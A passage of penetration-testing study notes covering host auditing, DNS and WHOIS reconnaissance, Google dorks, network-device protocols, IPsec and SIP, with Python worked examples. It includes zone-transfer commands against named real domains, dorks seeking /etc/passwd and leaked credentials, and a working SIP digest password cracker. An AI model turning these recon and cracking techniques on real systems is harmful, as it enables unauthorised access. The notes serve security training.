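    more restrictive wins."""
    ntfs = cumulative(ntfs_aces, user_groups)
    if not over_network:
        return ntfs
    share = cumulative(share_aces, user_groups)
    if "No Access" in (share, ntfs):
        return "No Access"
    return min(share, ntfs, key=ORDER.index)

# The page's scenarios: (principal, level, allow)
TOM = {"Sales", "Finance", "Staff"}
SHARE_1 = [("Sales", "Read", True), ("Staff", "Modify", True), ("Finance", "Read", True)]
NTFS_1 = [("Sales", "Modify", True), ("Staff", "Modify", True), ("Finance", "Read", True)]
SHARE_2 = [("Sales", "Read", True), ("Staff", "Read", True), ("Finance", "Read", True)]
NTFS_DENY = NTFS_1 + [("Finance", "Read", False)]   # Deny Read for Finance

if __name__ == "__main__":
    print("scenario 1 over network:", effective(SHARE_1, NTFS_1, TOM))
    print("scenario 2 over network:", effective(SHARE_2, NTFS_1, TOM))
    print("scenario 2 logged on locally:", effective(SHARE_2, NTFS_1, TOM, over_network=False))
    print("with an NTFS Deny:", effective(SHARE_1, NTFS_DENY, TOM))
```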
TrustedInstaller
TrustedInstaller.exe is the Windows Modules Installer service, which is part of Windows Resource Protection (WRP).
The TrustedInstaller SID (NT SERVICE\TrustedInstaller) is the owner of most system files and of many system
registry keys.
If someone with administrative rights attempts to modify or replace a file that is protected by WRP, they will be
presented with the message "Access Denied" unless they first take ownership (takeown/icacls), which is itself an
auditable event.
Analysing registry ACLs: registry keys carry the same kind of DACL as files. Review them from regedit (Permissions)
or with Get-Acl on an HKLM: path; keys that are writable by Users or Authenticated Users but read by a privileged
service (for example service ImagePath values) are a common privilege-escalation finding.
B14 - Audit Techniques
Listing processes and their associated network sockets (if any).
Windows - netstat -ano (the switches can be given in any order; -a all sockets, -n numeric, -o owning PID). Add -b
to print the executable name, which requires an elevated prompt.
Linux - lsof -i, netstat -lptu or, on modern systems where net-tools is no longer installed, ss -lptun. These list
listening ports and the processes that own them (seeing other users' process names needs root). To see which
process is bound to say port 22 use: lsof -i :22
Assessing patch levels.
 Linux – uname -a gives only the running kernel version; the patch level comes from /etc/os-release plus the
package manager (dpkg -l or apt list --upgradable on Debian-derived systems, rpm -qa or yum updateinfo on Red
Hat-derived ones).
 Windows PowerShell – Get-Hotfix - Gets the hotfixes that have been applied to the local and remote
computers. Get-CimInstance Win32_QuickFixEngineering returns the same data and is the supported replacement for
wmic, which is deprecated.
 systeminfo – will list installed hotfixes as well as other system info (OS version and build number, which
maps to the servicing level)
 wmic qfe – (QFE - Quick Fix Engineering) Can be run with a number of switches:
 wmic qfe list
 wmic qfe list full
Finding interesting files.
Linux: find <path> -name <pattern> -type <f|d> is the workhorse. Find all the files whose name is tecmint.txt in the
current working directory:
# find . -name tecmint.txt
./tecmint.txt
Find all the files under the /home directory with the name tecmint.txt. Use -iname for a case-insensitive match:
# find /home -name tecmint.txt
/home/tecmint.txt
Find all php files in a directory:
# find . -type f -name "*.php"
./tecmint.php
./login.php
./index.php
Find .err files in the /home/username/ directory and all sub-directories:
find /home/username/ -name "*.err"
Find all .jpg files in /home and sub-directories (quote the pattern, otherwise the shell expands it against the
current directory before find sees it):
find /home -name "*.jpg"
-type: specifies file type: f = regular file, d = directory, l = symbolic link
Other filters worth knowing when assessing a host: -perm -4000 (setuid files), -perm -o+w (world-writable),
-user/-group, -newermt "<date>" and -size; append 2>/dev/null to hide permission-denied noise.
Appendix C: Background Information Gathering & Open Source
C1 - Registration Records
Information contained within IP and domain registries (WHOIS).
Registrant, administrative and technical contacts, registrar, creation and expiry dates, name servers, and for IP
space the owning organisation, netblock range and abuse contact (held by the regional registries RIPE, ARIN, APNIC,
LACNIC and AFRINIC); personal contact details are often redacted since GDPR.
WHOIS - A protocol for searching internet registration databases based on RFC 3912 for domain names, IPs,
autonomous systems, etc. (TCP port 43).
whois example.com
C2 - Domain Name Server (DNS)
DNS zone transfers
AXFR - full zone transfer (RFC 5936), a DNS request that asks a name server for the entire zone; IXFR is the
incremental variant. Servers should restrict it to their secondaries; one that answers anybody hands over the
complete host list.
dig +short example.com
dig @<name-server-of-target> <target-zone> axfr
dig @ns2.iitk.ac.in iitk.ac.in axfr
The command to look up a zone's name servers through dig goes like:
dig <target-zone> ns
For finding the name servers of the target in the last example, we can use:
dig iitk.ac.in ns
nslookup (interactive; the ls -d zone listing only works in the Windows version)
server <DNS Server Name OR ip address of DNS server>
set type=any
ls -d <DNS Zone Name> > dnstest.txt
exit
The host command: host -t ns <zone> lists the authoritative name servers for a zone, while host -l <zone> attempts
a zone transfer (AXFR) from them:
host -l ucia.gov
DNS PTR Records
PTR records live in the reverse zones (in-addr.arpa for IPv4, ip6.arpa for IPv6), where the address octets are
written in reverse. The reverse zone for network 198.81.129.0/24 would be requested (as a zone transfer) with:
dig @ns-server 129.81.198.in-addr.arpa axfr
Zone file extract
; forward zone file for example.com
mail IN A 192.168.0.7
www IN CNAME mail.example.com. ; a CNAME must point at a name, never at an IP address
...
; reverse map zone file for 0.168.192.IN-ADDR.ARPA
...
7 IN PTR mail.example.com. ; the 7 is the last octet of 192.168.0.7
7 IN PTR www.example.com. ; several PTRs for one address are legal but most resolvers use only the first
A PTR can also be written with its fully qualified reverse name:
1.0.168.192.in-addr.arpa. IN PTR dns1.example.org.
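Worked example added to these notes (not from the original page): the reverse-name arithmetic above, in both directions and for IPv6 as well as IPv4, including the zone name to request for a whole network (reverse zones are cut on octet boundaries for IPv4 and nibble boundaries for IPv6). Only the standard library is used; function names are illustrative.

```python
import ipaddress

def reverse_name(ip: str) -> str:
    """PTR owner name for one address: octets reversed under in-addr.arpa, nibbles under ip6.arpa."""
    return ipaddress.ip_address(ip).reverse_pointer + "."

def reverse_zone(network: str) -> str:
    """The zone to request (AXFR) for a whole network, e.g. 198.81.129.0/24 -> 129.81.198.in-addr.arpa.
    IPv4 reverse zones are delegated on octet boundaries (/8, /16, /24); IPv6 ones on nibble
    boundaries (any multiple of 4 bits)."""
    net = ipaddress.ip_network(network, strict=True)
    if net.version == 4:
        if net.prefixlen % 8:
            raise ValueError("classless delegation (RFC 2317): no plain in-addr.arpa zone for this prefix")
        octets = str(net.network_address).split(".")[: net.prefixlen // 8]
        return ".".join(reversed(octets)) + ".in-addr.arpa."
    if net.prefixlen % 4:
        raise ValueError("IPv6 reverse zones are cut on nibble boundaries")
    nibbles = net.network_address.exploded.replace(":", "")[: net.prefixlen // 4]
    return ".".join(reversed(nibbles)) + ".ip6.arpa."

def from_reverse_name(name: str) -> str:
    """Inverse: the address a full PTR owner name refers to (useful when reading a transferred zone)."""
    labels = name.rstrip(".").split(".")
    if labels[-2:] == ["in-addr", "arpa"]:
        return ".".join(reversed(labels[:-2]))
    if labels[-2:] == ["ip6", "arpa"]:
        return str(ipaddress.IPv6Address(int("".join(reversed(labels[:-2])), 16)))
    raise ValueError("not a reverse-zone name")

if __name__ == "__main__":
    print(reverse_name("192.168.0.1"))            # 1.0.168.192.in-addr.arpa.
    print(reverse_zone("198.81.129.0/24"))        # 129.81.198.in-addr.arpa.
    print(reverse_zone("2001:db8::/32"))          # 8.b.d.0.1.0.0.2.ip6.arpa.
    print(from_reverse_name(reverse_name("2001:db8::7")))
```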
DNS Version Information
dig @nameserver version.bind chaos txt
Can also be done using nslookup by setting class=chaos and type=txt, then querying version.bind. Well-run servers
return a decoy or refuse; the answer is used to match the software against known vulnerabilities.
DNS queries and responses
DNS zone transfers, Structure, interpretation and analysis of DNS records:
SOA, MX, TXT, A, NS, PTR, HINFO, CNAME
SOA: Start of Authority - names the primary name server and the administrator's mailbox for the zone and carries the
serial number and the refresh/retry/expire timers that secondaries use.
NS: the authoritative name servers for the zone. MX: mail exchangers with a preference value (lowest is tried
first); they reveal who handles the target's mail. A: name to IPv4 address. CNAME: alias to another name.
TXT: A TXT record (short for text record) is a type of resource record in the Domain Name System (DNS) used to
associate arbitrary text with a host or other name, such as human readable information about a server, network,
data centre, or other accounting information. Today it mainly carries Sender Policy Framework (SPF), DKIM and DMARC
policies, which make it harder to spoof mail from the domain, and domain-verification tokens from SaaS providers,
which leak which services the organisation uses.
HINFO: Host Information - A HINFO record specifies the host's CPU type and operating system. It was intended for
application protocols such as FTP, which used special procedures when communicating with computers of a known CPU
and operating system type; it is rarely published now precisely because it is free reconnaissance.
AAAA: IPv6 address record
C3 - Customer Web Site Analysis
Analysis of information from a target web site, both from displayed content and from within the HTML source.
Look at the displayed content (staff names, e-mail address format, technologies, job adverts), the HTML source
(comments, hidden form fields, JavaScript containing internal hostnames or API endpoints), robots.txt and
sitemap.xml, and document metadata (author names and software versions in PDFs and Office files).
C4 - Google Hacking and Web Enumeration
Google Dorks
 site:paypal.com -www.paypal.com : this removes known hosts; keep adding -host exclusions until all sub
domains are exhausted
 site:site.com -www -cdn
 site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 (Julian day numbers)
 inurl:slatergordon.com.au combined with a keyword: password, username, sql, or filetype:txt
 inurl:/etc/passwd%00 intext:root
 Sometimes the tools will miss pages; try .php?= or inurl:"?id="
 site:https://play.esea.net/ ext:php
 filetype:xlsx site:
 intitle:index of site:
 inurl:etc/passwd site:
 intext:
C5 - NNTP Newsgroups and Mailing Lists
C6 - Information Leakage from Mail & News Headers
Appendix D: Networking Equipment
D1 - Management Protocols
Weaknesses in the protocols commonly used for the remote management of devices:
Telnet
Telnet (TCP 23) sends the whole session, credentials included, in cleartext; anyone on the path can sniff or hijack
it. By default Linux refuses root logins on terminals other than the console, so if you need root access via telnet
(on a lab box, never in production):
Edit /etc/pam.d/login and /etc/pam.d/remote and comment out the line below:
#auth required pam_securetty.so
Alternatively, edit the file /etc/securetty and add the following to the end of the file:
pts/0
Web based protocols
Device web interfaces are often plain HTTP (cleartext credentials and session cookies), ship with default
credentials, and expose the same configuration as the CLI, so they deserve the same scrutiny.
SSH
See SSH
SNMP
UDP port 161 (agent queries) and UDP port 162 (traps sent to the manager)
SNMP depends on community strings that grant access to portions of devices' management planes: a read-only string
reveals configuration, routing tables, ARP caches, interfaces and users; a read-write string lets an attacker change
the configuration (on Cisco devices, including copying it out over TFTP). Abuse of SNMP could allow an unauthorized
third party to gain access to a network device. The defaults "public" and "private" are still widely found.
SNMPv3 should be the only version of SNMP employed because SNMPv3 has the ability to authenticate and encrypt
payloads. When either SNMPv1 or SNMPv2c are employed, an adversary could sniff network traffic to determine the
community string. This compromise could enable a man-in-the-middle or replay attack.
Although SNMPv1 and SNMPv2c have similar characteristics, 64-bit counters and the GetBulk operation were added to
SNMPv2 so it could support faster interfaces. SNMPv3 replaces community strings with user-based security (USM) and
adds both encryption and authentication, which can be used together or separately (noAuthNoPriv, authNoPriv,
authPriv).
Mistakes in the configuration of the read-write mode can make a network susceptible to attacks.
SNMP v1 sends community strings in cleartext over the network.
SNMP v2c, the variant that was actually deployed, does exactly the same; only the abandoned party-based SNMPv2
(v2p/v2u) had MD5-based authentication.
SNMP v3 uses HMAC-MD5 or HMAC-SHA for authentication and DES or AES for privacy, to offer protection against
unauthorised data modification and masquerade attacks. Weak v3 passphrases can still be brute-forced offline from a
capture.
The authentication mechanism in SNMPv3 assures that a received message was, in fact, transmitted by the principal
whose identifier appears as the source in the message header. In addition, this mechanism assures that the message
was not altered in transit and that it was not artificially delayed or replayed (a 150-second timeliness window).
TFTP
TFTP is a minimal file transfer protocol that does not provide subcommands to list remote files, and does not require
authentication. Basic client syntax (Windows tftp.exe) is tftp [-i] host [GET | PUT] source [destination] where -i
is for binary transfer. UDP port 69.
A TFTP server is not part of a default Windows install (the client is an optional feature). Network devices use
TFTP to back up and load configurations and firmware, so an open TFTP server with guessable filenames (router.cfg,
startup-config) can hand over device configs containing hashed or cleartext credentials.
Cisco Reverse Telnet
Reverse telnet is used mostly for connecting to the console port of a router, a switch or other device through a
terminal server; the lines are exposed on TCP port 2000 plus the line number (2001, 2002, ...), usually with no
authentication beyond whatever the attached device asks for.
NTP
Implementations send and receive timestamps using the UDP port 123. They can also use broadcasting or
multicasting, where clients passively listen to time updates after an initial round-trip calibrating exchange. NTP is
intended to synchronize all participating computers to within a few milliseconds of Coordinated Universal Time
(UTC).
NTP uses a hierarchical system of time sources. Each level of this hierarchy is termed a stratum and is assigned a
number starting with zero for the reference clock at the top. Stratum 0 are high-precision timekeeping devices and
are also known as reference clocks. Stratum 3 are computers that are synchronized to stratum 2 servers and can act
as servers for stratum 4 computers, and so on. The upper limit for stratum is 15; stratum 16 is used to indicate that a
device is unsynchronized.
The 64-bit timestamps consist of a 32-bit part for seconds and a 32-bit part for fractional second. NTP uses an epoch
of January 1, 1900, so the seconds field wraps in 2036 (era rollover). NTPv4 introduces a 128-bit date format: 64
bits for the second (era number plus era offset) and 64 bits for the fractional second.
An NTP reply does not carry a single "current time"; it carries four timestamps from which the client computes its
clock offset from the server and the round-trip delay.
Synchronizing a client to a network server consists of several packet exchanges where each exchange is a pair of
request and reply. When sending out a request, the client stores its own time (originate timestamp) into the packet
being sent. When a server receives such a packet, it will in turn store its own time (receive timestamp) into the
packet, and the packet will be returned after putting a transmit timestamp into the packet. When receiving the
reply, the receiver will once more log its own receipt time to estimate the travelling time of the packet. The
travelling time (delay) is estimated to be half of "the total delay minus remote processing time", assuming
symmetrical delays.
Only if the replies from a server satisfy the conditions defined in the protocol specification, the server is considered
valid.
Reference Timestamp The time the system clock was last set or corrected, in 64-bit time-stamp format.
Originate Timestamp The time at which the request departed the client for the server, in 64-bit time-stamp format.
Receive Timestamp The time at which the client request arrived at the server in 64-bit time-stamp format.
Transmit Timestamp The time at which the server reply departed the server, in 64-bit time-stamp format.
NTP servers can be susceptible to man-in-the-middle attacks unless packets are cryptographically authenticated (the
symmetric-key MAC of the classic protocol, or Network Time Security for NTPv4). NTP message spoofing can be used to
move clocks on client computers and allow a number of attacks based on bypassing cryptographic key and certificate
expiry, replaying Kerberos tickets, or defeating time-based one-time passwords.
 Replay-delay attacks, MITM; an off-path attacker must also guess the originate timestamp the client expects to
see echoed back.
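Worked example added to these notes (not from the original page): the client request, a constructed server reply carrying the four timestamps described above, and the RFC 5905 offset/delay arithmetic, including the originate-timestamp check a client applies before trusting a reply. The server reply is fabricated in code (no network); the constants and field layout are the 48-byte NTP header.

```python
import struct

NTP_EPOCH_OFFSET = 2208988800        # seconds from 1900-01-01 (NTP epoch) to 1970-01-01 (Unix)
PACKET = "!BBbbII4s8I"               # 48-byte NTP header, network byte order

def to_ntp(unix: float) -> tuple:
    """Unix float seconds -> (32-bit seconds since 1900, 32-bit fraction)."""
    whole = int(unix)
    return (whole + NTP_EPOCH_OFFSET) & 0xFFFFFFFF, int((unix - whole) * (1 << 32))

def from_ntp(secs: int, frac: int) -> float:
    return secs - NTP_EPOCH_OFFSET + frac / (1 << 32)

def client_request(t1: float) -> bytes:
    """Mode 3 (client) packet; the client's send time T1 goes in the Transmit Timestamp field."""
    li_vn_mode = (0 << 6) | (4 << 3) | 3          # leap=0, version=4, mode=3
    return struct.pack(PACKET, li_vn_mode, 0, 0, 0, 0, 0, b"\0" * 4,
                       0, 0, 0, 0, 0, 0, *to_ntp(t1))

def server_reply(request: bytes, t2: float, t3: float, stratum: int = 2) -> bytes:
    """Constructed mode 4 (server) reply: echoes our T1 as Originate, stamps Receive=T2, Transmit=T3."""
    f = struct.unpack(PACKET, request)
    li_vn_mode = (0 << 6) | (4 << 3) | 4
    return struct.pack(PACKET, li_vn_mode, stratum, 6, -20, 0, 0, b"\0" * 4,
                       *to_ntp(t2 - 64), f[13], f[14], *to_ntp(t2), *to_ntp(t3))

def parse(packet: bytes) -> dict:
    f = struct.unpack(PACKET, packet)
    return {"leap": f[0] >> 6, "version": (f[0] >> 3) & 7, "mode": f[0] & 7, "stratum": f[1],
            "reference": from_ntp(f[7], f[8]), "originate": from_ntp(f[9], f[10]),
            "receive": from_ntp(f[11], f[12]), "transmit": from_ntp(f[13], f[14])}

def clock_estimate(request: bytes, reply: bytes, t4: float) -> tuple:
    """RFC 5905 on-wire arithmetic with the sanity checks a client applies before trusting a reply."""
    r = parse(reply)
    if r["mode"] != 4:
        raise ValueError("not a server reply")
    if struct.unpack(PACKET, request)[13:15] != struct.unpack(PACKET, reply)[9:11]:
        raise ValueError("Originate does not echo our Transmit: spoofed, replayed or stale")
    if not 1 <= r["stratum"] <= 15:
        raise ValueError("unsynchronised or invalid stratum")
    t1, t2, t3 = r["originate"], r["receive"], r["transmit"]
    delay = (t4 - t1) - (t3 - t2)        # round trip minus the server's processing time
    offset = ((t2 - t1) + (t3 - t4)) / 2 # assumes the two one-way delays are symmetric
    return offset, delay

def accepts(request: bytes, reply: bytes, t4: float) -> bool:
    try:
        clock_estimate(request, reply, t4)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    # Constructed timeline: server clock runs 10 s ahead of the client's, 100 ms round trip.
    req = client_request(1700000000.0)
    rep = server_reply(req, 1700000010.05, 1700000010.051)
    print("offset, delay:", clock_estimate(req, rep, 1700000000.1))
    # A reply answering a different request is rejected, which is what an off-path spoofer runs into.
    stale = server_reply(client_request(1700000001.0), 1700000011.05, 1700000011.051)
    print("accepts stale reply:", accepts(req, stale, 1700000001.1))
```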
D2 - Network Traffic Analysis
Techniques for local network traffic analysis.
Analysis of network traffic stored in PCAP files.
D3 - Networking Protocols
Security issues relating to the networking protocols:
ARP - ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed)
Address Resolution Protocol (ARP) messages onto a local area network so that victims associate the attacker's MAC
address with the gateway's IP (or vice versa), giving the attacker a man-in-the-middle position. Mitigations:
dynamic ARP inspection on switches, static entries for critical hosts.
DHCP - There are two different classes of potential security problems related to DHCP:
Unauthorized DHCP Servers (a rogue server hands out a malicious default gateway or DNS server) and Unauthorized
DHCP Clients (address-pool exhaustion by requesting leases with spoofed MAC addresses). Mitigation: DHCP snooping
on switches.
CDP – The Cisco Discovery Protocol is a proprietary layer 2 protocol that all Cisco devices can use by default. CDP
discovers other Cisco devices that are directly connected.
10:41:55.398940 snap 0:0:c:20:0 CDP v2, ttl: 180s, checksum: 692 (unverified)
Device-ID (0x01), length: 25 bytes: 'MYSWITCH01.net.somecompany.com'
Cisco Discovery Protocol runs on all media that support Subnetwork Access Protocol (SNAP), LAN, Frame Relay, and
ATM media. Cisco Discovery Protocol runs over the data link layer only. Therefore, two systems that support different
network-layer protocols can learn about each other. The Subnetwork Access Protocol (SNAP) is a mechanism for
multiplexing, on networks using IEEE 802.2 LLC. The SNAP header consists of a 3-octet IEEE organizationally unique
identifier (OUI) followed by a 2-octet protocol ID.
CDP may be used between Cisco routers, switches and other network equipment to advertise their software version,
capabilities, native VLAN and IP address, all in cleartext to anyone on the segment (listen with tcpdump or
Wireshark). CDP spoofing is the creation of forged CDP packets that impersonate other devices, either real or
arbitrary. CDP cache pollution – the CDP table becomes unusable because it contains a lot of false information
(Yersinia floods it). Disable CDP on user-facing ports.
HSRP - HSRP provides redundancy for IP networks ensuring that traffic can transparently recover from first hop
failures. Devices which share a common layer 2 domain participate in a virtual router environment ensuring that a
single device assumes the egress routing role. By continually exchanging HSRP messages, eligible devices can
automatically take over routing responsibilities if issues arise with the active device. An attacker on the segment
who sends hellos with a higher priority (and the authentication string, which defaults to "cisco" and is sent in
cleartext) becomes the active router and sees all egress traffic.
VRRP - The Virtual Router Redundancy Protocol (VRRP) is a computer networking protocol that provides for
automatic assignment of available Internet Protocol (IP) routers to participating hosts. This increases the
availability and reliability of routing paths via automatic default gateway selections on an IP subnetwork. The
same priority-spoofing attack applies.
VTP - The VLAN Trunking Protocol (VTP) is a proprietary Cisco protocol designed to make life easy by automatically
propagating VLAN information throughout the network. Layer 2 attacks (tool: Yersinia):
Attacks: sending a VTP packet with a higher revision number, deleting all VTP VLANs, deleting one VLAN, adding one
VLAN. VLAN hopping (switch spoofing via DTP, or double tagging) is a separate layer 2 attack that Yersinia also
performs.
STP - STP Attack – involves an attacker spoofing the root bridge in the topology by sending BPDUs with a lower bridge
priority, so that traffic is re-routed through the attacker. User-facing ports should have BPDU Guard (with PortFast)
enabled so that a BPDU from a host shuts the port, while root guard protects the intended root on links between
switches; simply disabling STP invites loops. Use Ettercap to bridge the two interfaces and Yersinia to send the
crafted BPDUs (Bridge Protocol Data Units).
TACACS+ - The security principle involved is Authentication, Authorization and Accounting (AAA). The two main AAA
protocols commonly used in enterprise networks today are TACACS+ and RADIUS. Terminal Access Controller Access-
Control System (TACACS) is a protocol set created and intended for controlling access to UNIX terminals. Cisco
created a new, incompatible protocol called TACACS+.
TACACS+ uses Transmission Control Protocol (TCP) port 49 to communicate between the TACACS+ client and the
TACACS+ server, and obfuscates the whole packet body (RADIUS, on UDP 1812/1813, hides only the password). An
example is a Cisco switch authenticating and authorizing administrative access to the switch's IOS CLI. The switch
is the TACACS+ client, and Cisco Secure ACS (now ISE) is the server.
Vulnerabilities of TACACS+ (the body "encryption" is an MD5-derived keystream XOR rather than a real cipher, driven
by a static shared secret):
1. Lack of integrity checking - Almost no integrity checking exists in TACACS+.
2. Vulnerability to replay attacks - duplicate accounting records can be produced, possibly with forged task_id
fields to avoid detection.
3. Forced session-id collisions - The encryption of reply packets can be compromised.
4. The birthday paradox and session_id's - given enough sessions, encryption of many may be compromised.
Another problem with session_id's is that they're too small to be unique if randomly chosen.
5. Lack of padding - the lengths of user passwords can be determined.
6. MD5 context leak
D4 - IPSec
Enumeration and fingerprinting of devices running IPSec services.
Open UDP port 500 (ISAKMP/IKE) and UDP port 4500 (NAT-Traversal), and permit IP protocol numbers 50 (ESP) and 51
(AH) on both inbound and outbound firewall filters. ESP and AH are not TCP/UDP services: they are IP protocols in
their own right, alongside TCP (IP proto 6) and UDP (IP proto 17), so a port scan never sees them.
You can use nmap's UDP scan (-sU) to identify the ISAKMP service on UDP port 500. After identifying accessible
ISAKMP services, you can probe and investigate these services to fingerprint and identify them; ike-scan does this
by sending IKE proposals and matching the vendor ID payloads and retransmission backoff pattern in the replies.
Remote users who require remote access to internal network resources often use a pre-shared key (PSK) to
authenticate. A serious weakness exists in IKEv1, which can be exploited if a VPN gateway supports aggressive mode
IKE and a PSK is used to provide authentication.
A remote attacker can attempt to authenticate using aggressive mode IKE and obtain a hashed authentication
response from the gateway. When using main mode IKE, this authentication response is sent encrypted under keys
derived from the Diffie-Hellman shared secret, but aggressive mode sends it in the clear. If a PSK is in use (as
opposed to digital signatures or public key encryption), the aggressive mode IKE authentication response (HASH_R)
is an HMAC-MD5 or HMAC-SHA1 computation keyed by the PSK over values the attacker already holds (the nonces, the
public Diffie-Hellman values, the cookies, the SA and the ID payloads). This hash can be attacked offline with a
dictionary (ike-scan -A to obtain it, psk-crack to crack it), and the PSK compromised.
VPNs can be classified into two primary types. Site-to-Site VPNs, and Remote Access VPNs. We will look at layer-3
IPsec VPNs that require a thick VPN client, as opposed to SSL-based VPNs that require only a browser on the client
machine to establish connectivity to internal resources like file and mail servers.
IPsec is based on symmetric-key encryption and consists of the following primary security components:
 Authentication Header (AH): This is essentially a message authenticity checksum that is appended to every
packet to ensure its authenticity and protect its integrity as it traverses the Internet.
 Encapsulating Security Payload (ESP): This is the encryption mechanism used to protect the confidentiality of
communication between the subjects.
 Internet Key Exchange (IKE): This protocol provides a means to securely exchange the secret key, which is
essential for the effective operation of the AH and ESP between the communicating subjects. While the
secret keys can be manually exchanged, such a solution is not scalable and the keys should be changed
periodically to minimize the probability of their compromise. IKE has two modes - IKE Main Mode and IKE
Aggressive Mode. Both use a Diffie-Hellman exchange to generate a mutual shared key between the client and the
server; the difference is that Main Mode (six messages) completes the exchange before authenticating, so the
authentication hashes travel encrypted, while Aggressive Mode (three messages) sends the identity and the
authentication hash in the clear. Therefore, it is possible to capture this authentication data using a sniffer
(or simply by being the initiator) and crack it offline.
The main objective of this phase is to discover any vulnerabilities in the VPN implementation that an attacker may be
able to exploit. This is usually considered a zero-knowledge test where only the IP address of the VPN server is
known. This phase will be shown using three steps:
1. Reconnaissance: determining open ports and doing VPN fingerprinting
2. Assessment of PSK protocol mode
3. Exploitation of any default user accounts
The first step in the reconnaissance process entails port scanning the VPN server to make an educated guess on the
type of VPN implementation. The default ports map to VPN types as follows: UDP 500/4500 (plus IP protocols 50/51) -
IPsec/IKE; UDP 1701 together with IPsec - L2TP/IPsec; TCP 1723 plus GRE - PPTP; UDP or TCP 1194 - OpenVPN; TCP 443
- SSL VPNs (distinguished from an ordinary web server by the vendor login page and certificate).
PPTP
PPTP uses TCP 1723 for control and IP protocol 47 (GRE) to carry the tunnelled PPP frames between peers; the
payload is encrypted with MPPE (RC4) and authentication is usually MS-CHAPv2, whose challenge/response can be
cracked offline (a DES key search that always succeeds), so PPTP should be treated as unencrypted.
D5 - VoIP
Enumeration and fingerprinting of devices running VoIP services.
Ports 5060 & 5061 - SIP (VoIP) on TCP and UDP are associated with the Session Initiation Protocol (SIP). Port 5060 is
commonly used for unencrypted signalling traffic whereas port 5061 is typically used for signalling encrypted with
Transport Layer Security (TLS). Media (RTP) flows on separate, negotiated UDP ports.
Knowledge of the SIP protocol – (Session Initiation Protocol)
Like HTTP it is a text-based request/response protocol: for signalling, handsets talk to a proxy/registrar rather
than directly to each other, although the media stream itself often runs peer to peer.
There are two different types of SIP messages: requests and responses.
 The first line of a request has a method, defining the nature of the request, and a Request-URI, indicating
where the request should be sent. Example: REGISTER
 The first line of a response has a response code. Example: 200 is success.
 1xx - Provisional Messages.
 2xx - Success Answers.
 3xx - Redirection Answers.
 4xx - Method Failures: 401 – Unauthorised, 403 - Forbidden
 5xx - Server Failures.
 6xx - Global Failures.
You can sniff the traffic and run it through the sipcrack suite. The REGISTER with its Authorization header carries
the user ID, SIP extension, realm, nonce and the MD5 digest response (not the password itself); with those, the
password can be brute-forced offline.
There are six basic methods (defined in RFC 3261) for the client requests:
HELLO - not a SIP method; it appears here only as a distractor, the real six follow.
INVITE: Invites a user or a service to a new session or to modify parameters of an established session. The INVITE
message initiates a SIP dialog with the intent to establish a call. It is sent by a user agent client to a user
agent server and is answered with 100 Trying / 180 Ringing and finally 200 OK (see diagram above showing flow).
It can be used for username enumeration, but it makes the target handset ring, so it is the noisiest probe.
Caller ID spoofing is done by setting the From header of the INVITE. There are numerous ways to craft malformed
SIP INVITE messages (scapy, SIPp) for fuzzing.
ACK: Confirms that the client has received the final response to an INVITE, completing the three-way exchange that
establishes the session (INVITE, 200 OK, ACK).
OPTIONS: Request information about the capabilities of a server.
BYE: End of a session
CANCEL: Cancel a pending request
REGISTER (to IP-PBX server): Register the user agent when new client is connected/reconnected to the network by
sending REGISTER request to IP-PBX server for registering the associated user ID/extension number. Also implements
a location service for user agents, which indicate their address information to the server.
sip-enum-users – Nmap script works by sending REGISTER SIP requests to the server with the specified extension and
checking the response status code in order to know if an extension is valid. If the response status code is 401 or
407, it means that the extension is valid and requires authentication. If the response status code is 200, it means
that the extension exists and doesn't require any authentication, while a 403 response status code means that the
extension exists but access is forbidden (404 means it does not exist). REGISTER and OPTIONS probes are quieter
than INVITE because they never make a handset ring, but a PBX configured to return the same code for every
extension defeats the technique; response timing sometimes still leaks it.
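Worked example added to these notes (not from the original page) serving the two passages above: the status-code decision sip-enum-users makes on a REGISTER reply, and the offline attack on a sniffed REGISTER's digest response (what sipcrack does). The captured REGISTER is fabricated in code from a known password so the crack has something to match; the extension, realm and nonce are made-up. The digest formula is RFC 2617 as used by RFC 3261; the parser only handles quoted parameters, which is what phones normally send.

```python
import hashlib
import re

def classify_register_response(status_line: str) -> str:
    """The decision sip-enum-users makes on the first line of each reply to a REGISTER probe."""
    code = int(status_line.split()[1])
    return {401: "exists (auth required)", 407: "exists (proxy auth required)",
            200: "exists (no auth)", 403: "exists (forbidden)",
            404: "unknown"}.get(code, f"other ({code})")

def parse_sip(raw: str) -> tuple:
    """Split a SIP message into its first line and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    first, *rest = head.split("\r\n")
    headers = {}
    for line in rest:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return first, headers

def parse_digest(value: str) -> dict:
    # Digest username="201", realm="asterisk", nonce="...", uri="sip:...", response="..."
    return dict(re.findall(r'(\w+)="([^"]*)"', value))

def digest_response(user, realm, password, method, uri, nonce, qop=None, nc=None, cnonce=None) -> str:
    """MD5 digest: HA1 = md5(user:realm:password), HA2 = md5(method:uri), response = md5(HA1:nonce:HA2)
    (with nc/cnonce/qop inserted when the server negotiated qop=auth)."""
    ha1 = hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    if qop:
        return hashlib.md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()

def crack_register(raw: str, wordlist):
    """Recompute the response for each candidate password; the nonce and uri come from the capture."""
    request_line, headers = parse_sip(raw)
    method = request_line.split()[0]
    d = parse_digest(headers["authorization"])
    for candidate in wordlist:
        if digest_response(d["username"], d["realm"], candidate, method, d["uri"], d["nonce"],
                           d.get("qop"), d.get("nc"), d.get("cnonce")) == d["response"]:
            return candidate
    return None

def build_register(user: str, realm: str, password: str, nonce: str, uri: str = "sip:pbx.example.test") -> str:
    """Constructs the REGISTER a handset sends after a 401 challenge; used only to fabricate the capture."""
    resp = digest_response(user, realm, password, "REGISTER", uri, nonce)
    return ("REGISTER " + uri + " SIP/2.0\r\n"
            "From: <sip:" + user + "@pbx.example.test>\r\n"
            'Authorization: Digest username="' + user + '", realm="' + realm + '", '
            'nonce="' + nonce + '", uri="' + uri + '", response="' + resp + '"\r\n'
            "Content-Length: 0\r\n\r\n")

CAPTURED = build_register("201", "asterisk", "5544", "4f3c2b1a")   # constructed; password is 5544

if __name__ == "__main__":
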